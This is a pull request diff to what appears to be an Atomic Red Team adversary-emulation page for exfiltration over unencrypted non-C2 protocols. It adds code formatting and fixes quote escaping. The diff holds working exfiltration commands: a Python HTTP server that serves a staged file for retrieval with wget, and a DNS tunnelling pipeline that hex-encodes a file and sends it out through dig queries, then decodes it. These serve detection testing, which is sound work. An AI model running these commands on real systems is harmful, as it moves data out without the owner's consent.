### PR TITLE
Update T1048.003.md

### DIFF
--- a/atomics/T1048.003/T1048.003.md
+++ b/atomics/T1048.003/T1048.003.md
@@ -42,17 +42,23 @@ Upon successful execution, sh will be used to make a directory (/tmp/victim-stag
 #### Run it with these steps! 
 1. Victim System Configuration:
 
-    mkdir /tmp/victim-staging-area
-    echo "this file will be exfiltrated" > /tmp/victim-staging-area/victim-file.txt
+```bash
+mkdir /tmp/victim-staging-area
+echo "this file will be exfiltrated" > /tmp/victim-staging-area/victim-file.txt
+```
 
 2. Using Python to establish a one-line HTTP server on victim system:
 
-    cd /tmp/victim-staging-area
-    python -m SimpleHTTPServer 1337
+```bash
+cd /tmp/victim-staging-area
+python -m SimpleHTTPServer 1337
+```
 
 3. To retrieve the data from an adversary system:
 
-    wget http://VICTIM_IP:1337/victim-file.txt
+```bash
+wget http://VICTIM_IP:1337/victim-file.txt
+```
 
 
 
@@ -114,15 +120,21 @@ Exfiltration of specified file over DNS protocol.
 #### Run it with these steps! 
 1. On the adversary machine run the below command.
 
-    tshark -f "udp port 53" -Y "dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name matches ".domain"" >> received_data.txt
+```bash
+tshark -f "udp port 53" -Y "dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name matches \".TLD\"" >> received_data.txt
+```
 
 2. On the victim machine run the below commands.
 
-    xxd -p input_file > encoded_data.hex | for data in `cat encoded_data.hex`; do dig $data.domain; done
+```bash
+xxd -p input_file > encoded_data.hex | for data in `cat encoded_data.hex`; do dig $data.TLD; done
+```
     
 3. Once the data is received, use the below command to recover the data.
 
-    cat output_file | cut -d "A" -f 2 | cut -d " " -f 2 | cut -d "." -f 1 | sort | uniq | xxd -p -r
+```bash
+cat output_file | cut -d "A" -f 2 | cut -d " " -f 2 | cut -d "." -f 1 | sort | uniq | xxd -p -r
+```
 
 
 


### PR DESCRIPTION
During using the DNS exfiltration test I stumbled upon an escaping issue with the double quotes. This PR will escape the quotes correctly in the example command.

Additionally, I added some code formatting for the Linux commands as their current formatting was only done through intendation which made it harder to extract just the commands than the code formatting.
